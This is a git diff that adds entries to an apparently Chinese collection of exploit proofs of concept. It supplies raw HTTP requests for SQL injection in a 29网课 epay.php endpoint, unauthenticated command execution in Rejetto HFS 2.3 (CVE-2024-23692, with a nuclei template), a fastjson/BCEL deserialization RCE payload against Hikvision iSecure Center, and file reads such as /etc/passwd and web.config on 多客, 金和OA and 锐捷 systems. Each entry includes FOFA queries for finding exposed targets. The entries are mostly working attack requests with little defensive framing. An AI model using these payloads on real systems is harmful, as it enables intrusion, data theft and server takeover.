diff --git a/29网课交单平台epay.php存在SQL注入漏洞.md b/29网课交单平台epay.php存在SQL注入漏洞.md
new file mode 100644
index 0000000..0bb4fea
--- /dev/null
+++ b/29网课交单平台epay.php存在SQL注入漏洞.md
@@ -0,0 +1,26 @@
+## 29网课交单平台epay.php存在SQL注入漏洞
+
+29网课交单平台 /epay/epay.php接口处存在SQL注入漏洞,未经授权攻击者可通过该漏洞获取数据库敏感信息,进一步利用可获取服务器权限,导致网站处于极度不安全状态。
+
+## fofa
+
+```
+body="你在看什么呢?我写的代码好看吗"
+```
+
+## poc
+
+```
+POST /epay/epay.php HTTP/1.1
+Host: your-ip
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
+Content-Type: application/x-www-form-urlencoded
+Connection: close
+
+out_trade_no=' AND (SELECT 8078 FROM (SELECT(SLEEP(5)))eEcA) AND 'aEmC'='aEmC
+```
+
+![image-20240610144912193](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406101449253.png)
\ No newline at end of file
diff --git a/HFS2.3未经身份验证的远程代码执行(CVE-2024-23692).md b/HFS2.3未经身份验证的远程代码执行(CVE-2024-23692).md
new file mode 100644
index 0000000..f53fed7
--- /dev/null
+++ b/HFS2.3未经身份验证的远程代码执行(CVE-2024-23692).md
@@ -0,0 +1,66 @@ +## HFS2.3未经身份验证的远程代码执行(CVE-2024-23692) + +Rejetto HTTP 文件服务器 2.3m 未经身份验证的 RCE + +## fofa + +``` +"HttpFileServer" +``` + +## poc + +``` +GET /?n=%0A&cmd=whoami&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} HTTP/1.1 +Host: +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Cookie: HFS_SID_=0.590236319694668 +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406092216228.png) + +![image-20240611150501738](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406111505997.png) + +## nuclei + +``` +id: CVE-2024-23692 + +info: + name: Rejetto HTTP File Server - Template injection + author: johnk3r + severity: critical + description: | + This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request. + reference: + - https://github.com/rapid7/metasploit-framework/pull/19240 + - https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/ + metadata: + verified: true + max-request: 1 + shodan-query: product:"HttpFileServer httpd" + tags: cve,cve2024,hfs,rce + +http: + - method: GET + path: + - "{{BaseURL}}/?n=%0A&cmd=nslookup+{{interactsh-url}}&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}" + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" + + - type: word + part: body + words: + - "rejetto" +``` + diff --git a/README.md b/README.md index cc75534..924fe4e 100644 --- a/README.md 
+++ b/README.md @@ -1,6 +1,15 @@ # 漏洞收集 收集整理漏洞EXP/POC,大部分漏洞来源网络,目前收集整理了600多个poc/exp,善用CTRL+F搜索 +## 2024.06.11 新增漏洞 + +- 海康威视综合安防管理平台keepAlive远程代码执行漏洞 +- 金和OA-C6-download.jsp任意文件读取漏洞 +- 锐捷校园网自助服务系统login_judge.jsf任意文件读取漏洞(XVE-2024-2116) +- HFS2.3未经身份验证的远程代码执行(CVE-2024-23692) +- 29网课交单平台epay.php存在SQL注入漏洞 +- 多客圈子论坛系统httpGet任意文件读取漏洞复现 + ## 2024.06.07 新增漏洞 - 天智云智造管理平台Usermanager.ashx存在SQL注入漏洞 diff --git a/多客圈子论坛系统httpGet任意文件读取漏洞复现.md b/多客圈子论坛系统httpGet任意文件读取漏洞复现.md new file mode 100644 index 0000000..cff387d --- /dev/null +++ b/多客圈子论坛系统httpGet任意文件读取漏洞复现.md @@ -0,0 +1,22 @@ +## 多客圈子论坛系统httpGet任意文件读取漏洞复现 + +多客圈子论坛系统 /index.php/api/login/httpGet 接口处存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。 + +## fofa + +``` +body="/static/index/js/jweixin-1.2.0.js" +``` + +## poc + +``` +GET /index.php/api/login/httpGet?url=file:///etc/passwd HTTP/1.1 +Host: your-ip +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 +Accept-Encoding: gzip, deflate +Accept: */* +Connection: keep-alive +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406101451766.png) \ No newline at end of file diff --git a/海康威视综合安防管理平台keepAlive远程代码执行漏洞.md b/海康威视综合安防管理平台keepAlive远程代码执行漏洞.md new file mode 100644 index 0000000..f6b3927 --- /dev/null +++ b/海康威视综合安防管理平台keepAlive远程代码执行漏洞.md 
@@ -0,0 +1,26 @@ +## 海康威视综合安防管理平台keepAlive远程代码执行漏洞 + + 海康综合安防管理平台keepAlive接口存在 fastjson 反序列化漏洞。攻击者可在未鉴权的情况下,对目标服务器进行远程命令执行,从而获取服务器权限。 + +## fofa + +``` +app="HIKVISION-综合安防管理平台" ||app="HIKVISION-iSecure-Center" +``` + +## poc + +``` +POST /bic/ssoService/v1/keepAlive HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; LBBROWSER) +Content-Length: 3330 +Content-Type: application/json +cmd: whoami +Accept-Encoding: gzip, deflate, br +Connection: close + +{"CTGT":{ "a": {"@type": "java.lang.Class","val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"},"b": {"@type": "java.lang.Class","val": "com.sun.org.apache.bcel.internal.util.ClassLoader"},"c": {"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource","driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"},"driverClassName": "$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$8dV$cb$5b$TW$U$ff$5dH27$c3$m$g$40$Z$d1$wX5$a0$q$7d$d8V$81Zi$c4b$F$b4F$a5$f8j$t$c3$85$MLf$e2$cc$E$b1$ef$f7$c3$be$ec$a6$df$d7u$X$ae$ddD$bf$f6$d3$af$eb$$$ba$ea$b6$ab$ae$ba$ea$7fP$7bnf$C$89$d0$afeq$ee$bd$e7$fe$ce$ebw$ce$9d$f0$cb$df$3f$3e$Ap$I$df$aaHbX$c5$IF$a5x$9e$e3$a8$8a$Xp$8ccL$c1$8b$w$U$e4$U$iW1$8e$T$i$_qLp$9c$e4x$99$e3$94$bc$9b$e4$98$e2$98VpZ$o$cep$bc$c2qVE$k$e7Tt$e2$3c$c7$F$b9$cep$bc$ca1$cbqQ$G$bb$c4qY$c1$V$VW$f1$9a$U$af$ab0PP$b1$h$s$c7$9c$5c$85$U$f3$i$L$iE$F$96$82E$86$c4$a8$e5X$c1Q$86$d6$f4$c0$F$86X$ce$9d$T$M$j$93$96$p$a6$x$a5$82$f0$ce$Z$F$9b4$7c$d4$b4$pd$7b$3e0$cc$a5$v$a3$5c$bb$a2j$U$yQ$z$94$ac$C$9b$fc2$a8y$b7$e2$99$e2$84$r$z$3b$f2e$cfr$W$c6$cd$a2$9bY4$96$N$N$H1$a4$a0$a4$c1$81$ab$a1$8ck$M$a3$ae$b7$90$f1k$b8y$cf$u$89$eb$ae$b7$94$b9$$$K$Z$d3u$C$b1$Sd$3cq$ad$o$fc$ms6$5cs$a1z$c2$b5$e7$84$a7$c0$d3$e0$p$60$e8Z$QA$84$Y$L$C$cf$wT$C$e1S$G2l$d66$9c$85l$ce6$7c_C$F$cb$M$9b$d7$d4$a7$L$8b$c2$M$a8$O$N$d7$b1$c2p$ec$ff$e6$93$X$de$b2$bda$d0$b6Z$$$7e$d9u$7c$oA$5d$cb$8ca$a7$M$bc$92$f1C$db5$lup$92$c03$9
e$V$I$aa$eb$86$ccto$b3A1$I$ca$99$J$S$cd$d1C$c3$Ja$Q$tM$d5$e5$DY$88$867$f0$s$f5$d9$y$cd1$u$ae$9fq$a80$Foix$h$efhx$X$ef$d1$e5$cc$c9i$N$ef$e3$D$86$96$acI$b0l$c1r$b2$7e$91$8eC$a6$86$P$f1$R$e9$q$z$81$ed0l$a9$85$a8$E$96$9d$cd$9b$86$e3$c8V$7c$ac$e1$T$7c$aa$e13$7c$ae$e0$a6$86$_$f0$a5l$f8W$e4$e1$f2$98$86$af$f1$8d$86$5b2T$7c$de$aeH$c7q$d3ve$d1$9dk$f9$8e$af$98$a2$iX$$$85$e85$ddRv$de$f0$83E$dfu$b2$cb$V$8a$b4$3aM$M$3dk6$9e$98$b7$a9$85$d9$v$R$U$5d$w$b0$f3$d2$e4$a3$E$8c4$91r$ae$e8$RS4$cdf$c5$f3$84$T$d4$cf$5d$e9$81$c9GQd$d9M$d4FSW$9b$a1I7$a4Yo$827$5cI$9b$N$_$a8M6mj$gjmz$7d$9e$eb$3c$8e$84$ad$ad$d7vl$D$9bK$ebl$g$bd4$b3C$ee$S$96$b3$ec$$$R$edG$g$7d$85$cf$a0$c9W$a4$gX$af$a2$feSN$c7$85i$h$9e$98$ab$e7$d6$ee$8b$60$cc4$85$ef$5b$b5$efF$y$7dQ$7eW$g$a7$f1$86$l$88R$f8$40$cexnYx$c1$N$86$7d$ff$c1$c3j$L$db$C$f7$7c$99$8cr$86$9c$9a$e6n$ad$82$b8$7c$a7$86$e5$Q$c1$bd$8d$8esE$c3$cb$cb$d7$e2$98bd$e0$o$Be$5b$c3Nt$ae$ef$e4H$7d$c6k$aa$b3$V$t$b0J$f5$c7$5c$3ft7$99Ej2$8c$89$VA$_$u$9d$de$60$Q$h$z$88$C$c9Vs$a8H$c9$b0$89B$9dt$ca$95$80$y$85A$acm$ab$87$b3$dcl$c3$F$99$f7$a47$bc$90$eck$V_$i$X$b6U$92$df$U$86$fd$ff$ceu$e3c$96E84$ef$e8$c3$B$fa$7d$91$7f$z$60$f2$ebM2C$a7$9d$b42Z$e3$83w$c1$ee$d0$86$nK2QS$s$c0$f1D$j$da$d2O$O$da$Ip$f5$kZ$aahM$c5$aa$88$9f$gL$rZ$efC$a9$82O$k$60$b4KV$a1NE$80$b6$Q$a0$d5$B$83$a9$f6h$3b$7d$e0$60$84$j$8e$N$adn$e3$91$dd$s$b2Ku$84$d0$cd$c3$89H$bbEjS1$d2$ce$b6$a6$3a$f3$f2J$d1$VJ$a2KO$84R$8f$d5$3dq$5d$d1$e3$EM$S$b4$9b$a0$ea$cf$e8$iN$s$ee$93TS$5b$efa$5b$V$3d$v$bd$8a$ed$df$p$a5$ab$S$a3$ab$b1To$fe6$3a$e4qG$ed$b8$93d$5cO$e6u$5e$c5c$a9$5d$8d$91u$k$3a$ff$J$bbg$ef$a1OW$ab$e8$afb$cf$5d$3c$9e$da$5b$c5$be$w$f6$cb$a03$a1e$3a$aaD$e7Qz$91$7e$60$9d$fe6b$a7$eeH$e6$d9$y$bb$8cAj$95$ec$85$83$5e$92IhP$b1$8d$3a$d0G$bb$n$b4$e306$n$87$OLc3f$b1$F$$R$b8I$ffR$dcB$X$beC7$7e$c0VP$a9x$80$k$fc$K$j$bfa$3b$7e$c7$O$fcAM$ff$T$bb$f0$Xv$b3$B$f4$b11$f4$b3Y$ec$a5$88$7b$d8$V$ec$c7$93$U$edY$c4$k$S$b8M$c1S$K$9eVp$a8$$$c3M$b8$7fF$n$i$da$k$c2$93s$a3$e099$3d$87k$pv$e4$l$3eQL$40E$J$A$A"}} +``` + 
+![image-20240608143042824](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406081430904.png) \ No newline at end of file diff --git a/海康威视综合安防系统detection接口存在RCE漏洞.md b/海康威视综合安防系统detection接口存在RCE漏洞.md index b849398..61e689a 100644 --- a/海康威视综合安防系统detection接口存在RCE漏洞.md +++ b/海康威视综合安防系统detection接口存在RCE漏洞.md @@ -1,8 +1,15 @@ ## 海康威视综合安防系统detection接口存在RCE漏洞 -## poc +## fofa + ``` -POST /center/api/installation/detection HTTP/1.1 +app="HIKVISION-综合安防管理平台" ||app="HIKVISION-iSecure-Center" +``` + +## poc + +``` +POST /center/api/installation/detection;.js HTTP/1.1 Host: xx.xx.xx.xx Cache-Control: max-age=0 Sec-Ch-Ua: "Google Chrome";v="105", "Not)A;Brand";v="8", "Chromium";v="105" diff --git a/金和OA-C6-download.jsp任意文件读取漏洞.md b/金和OA-C6-download.jsp任意文件读取漏洞.md new file mode 100644 index 0000000..ae93f8a --- /dev/null +++ b/金和OA-C6-download.jsp任意文件读取漏洞.md @@ -0,0 +1,18 @@ +## 金和OA-C6-download.jsp任意文件读取漏洞 + +金和OA C6 download.jsp文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中的敏感信息 + +## fofa + +``` +app="Jinher-OA" +``` + +## poc + +``` +/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=download.asp +/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config +``` + +![image-20240609162635854](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406091626910.png) \ No newline at end of file diff --git a/锐捷校园网自助服务系统login_judge.jsf任意文件读取漏洞(XVE-2024-2116).md b/锐捷校园网自助服务系统login_judge.jsf任意文件读取漏洞(XVE-2024-2116).md new file mode 100644 index 0000000..e67ba88 --- /dev/null +++ b/锐捷校园网自助服务系统login_judge.jsf任意文件读取漏洞(XVE-2024-2116).md 
@@ -0,0 +1,23 @@
+## 锐捷校园网自助服务系统login_judge.jsf任意文件读取漏洞(XVE-2024-2116)
+
+校园网自助服务系统/selfservice/selfservice/module/scgroup/web/login_judge.jsf 接口处存在任意文件读取漏洞,经过分析和研判,该漏洞利用难度低,可导致敏感信息泄漏,建议尽快修复。
+
+## fofa
+
+```
+body="校园网自助服务系统"
+```
+
+## poc
+
+```
+GET /selfservice/selfservice/module/scgroup/web/login_judge.jsf?view=./WEB-INF/web.xml%3F HTTP/1.1
+Host: your-ip
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+```
+
+![image-20240609163957648](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406091639825.png)
\ No newline at end of file